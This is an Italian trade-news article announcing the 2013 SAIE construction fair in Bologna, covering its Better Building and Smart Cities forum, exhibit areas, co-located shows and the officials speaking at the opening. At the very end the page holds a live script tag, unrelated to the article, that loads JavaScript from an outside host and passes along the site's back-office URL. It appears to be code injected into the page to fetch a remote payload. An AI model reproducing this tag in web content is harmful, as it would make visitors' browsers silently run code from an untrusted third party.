1. Home
  2. Notizie e Mercato
  3. Il SAIE di Bologna: un inizio con ottime premesse

Il SAIE di Bologna: un inizio con ottime premesse

Edilizia di
5/5
votato da 1 persone
A Bologna dal 16 al 19 ottobre 2013: la nuova piattaforma fieristica SAIE assieme alle manifestazioni Smart City, Expotunnel e Ambiente&Lavoro


Apre domani a BolognaFiereSAIE, il Salone dell’Innovazione Edilizia, con la nuova formula che per la prima volta ha messo assieme in un'unica grande piattaforma fieristica SAIE e le nuove manifestazioni Smart City, Expotunnel e Ambiente&Lavoro dedicata in particolare ai cantieri edili. La 49ma edizione di SAIE si presenta già con numeri straordinari: 9 padiglioni occupati, per 80.000 mq, più di 800 espositori, 60.000 visitatori già registrati sul sito internet della manifestazione e 43 delegazioni estere in arrivo a Bologna dal 16 al 19 ottobre.

Al centro di SAIE sarà il Forum Better Building e Smart Cities, che parte domani fino al 19 ottobre con sei general meetings nella nuova grande aula realizzata appositamente nel quadrilatero del Centro Servizi di BolognaFiere. Il Forum si compone di ben 25 appuntamenti tra General Meetings e Workshop tecnici dedicati all’aggiornamento dei professionisti, organizzati in collaborazione con le università e gli ordini professionali. A questi si aggiungono gli oltre 50 eventi, convegni e seminari organizzati dalle principali associazioni industriali e culturali italiane. Al Forum, parteciperanno, inoltre, 6 ministri dell’attuale governo e 50 docenti universitari, mentre vi sono già 5.100 iscritti preregistrati per assistere ai seminari di aggiornamenti professionali, che in alcuni casi rilasciano anche dei crediti formativi.

Nell’area dedicata alla Ricostruzione post terremoto, ci sarà lo spazio di incontro promosso dalla Regione Emilia Romagna sui temi di “Ricostruire l’Emilia” con la presentazione delle cose già fatte, delle soluzioni innovative già sperimentate, delle nuove proposte per la Ricostruzione, tra le quali, per la prima volta, la certificazione di sicurezza sismica degli edifici, ma anche programmi e bandi per le ulteriori tappe della Ricostruzione.

All’apposita area di SAIE dedicata alla ricerca e all’innovazione parteciperanno oltre venti centri specializzati di ricerca nell’edilizia, che presentano dal vivo i prototipi di soluzioni innovative assieme alle aziende committenti. Inoltre, i visitatori di SAIE troveranno per la prima volta la presenza delle aree organizzate dalle associazioni di categoria, tra qui quella che vede la presenza delle grandi imprese cementiere associate a Federbeton, il consorzio Lignius  con la più grande esposizione di case in legno mai realizzata in Italia, l’area dei laterizi allestita da Andil e quella delle pavimentazioni continue organizzata da Conpaviper.

Nell’area Green habitat si terranno dimostrazioni, lezioni e seminari sul costruire sostenibile e sul risparmio energetico; in parallelo, nell’area Progettare innovativo le principali case di software organizzeranno corsi dimostrativi per l’aggiornamento continuo dei professionisti: in particolare, tutte le novità del Building Information Modelling (BIM), ultima frontiera dei software per la progettazione integrata, capace di considerare nell’insieme le problematiche di funzionalità architettonica, sicurezza strutturale e efficienza energetica.

SAIE 2013 si svolgerà in contemporanea con Expotunnel dove si esporranno le nuove soluzioni per le gallerie e a cui saranno presenti le grandi aziende dell’Ingegneria Civile e del Sottosuolo, proponendo anche vari incontri della Società italiana gallerie; Smart City Exhibition, invece, coniugherà le tematiche del better building con quelle della realizzazione delle reti digitali allo scopo di rendere le città più intelligenti, mentre nell’area Ambiente&Lavoro saranno presenti imprese e incontri dedicati in particolare alla sicurezza nei cantieri edili.

Il nuovo SAIE si apre domani alle 10.30 con il convegno inaugurale dedicato all'edilizia sostenibile e alle smart city. All’incontro, aperto dal Sindaco di Bologna, Virginio Merola, dai Presidenti di Bologna Fiere, Duccio Campagnoli, e di FORUM PA, Carlo Mochi Sismondi, interverrà anche il Ministro del Lavoro e delle Politiche Sociali, Enrico Giovannini, per parlare di qualità della vita, del nuovo welfare urbano e delle possibilità occupazionali nelle città. I Presidenti degli Ordini degli Ingegneri, Armando Zambrano, del Consiglio Nazionale degli Architetti, Leopoldo Freyre, e dell’ANCE Associazione Nazionale Costruttori Edili, Paolo Buzzetti, insieme al Senatore USA, Harris McDowell, invece, faranno il punto sul necessario cambio di passo nelle politiche per l’edilizia sostenibile. A seguire, il capo dell’Innovazione della città di Barcellona, Manel Sanromà, il Presidente del CNR, Luigi Nicolais, e il Professor Francesco Profumo per ANCI presenteranno il paradigma della “città intelligente” e i progetti smart all’avanguardia in Italia.

Nel pomeriggio di domani è, invece, prevista la partecipazione del ministro delle Infrastrutture, Maurizio Lupi, che si intratterrà con i protagonisti dell’edilizia presenti a SAIE per fare il punto sulle nuove misure di rilancio dell’industria, mentre ospite d’onore dell’intera giornata inaugurale sarà la delegazione del Delaware con il senatore Harris Mc Dowell, protagonista del programma del presidente degli Stati uniti Barack ObamaBETTER BUILDINGS” al quale il forum SAIE 203 si ispira per il rilancio dell’industria edilizia. L’intenso programma del Forum Better Building & Smart Cities proseguirà fino a Sabato 19 all’interno dei padiglioni di BolognaFiere.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.7553376081303278" type="text/javascript"></script>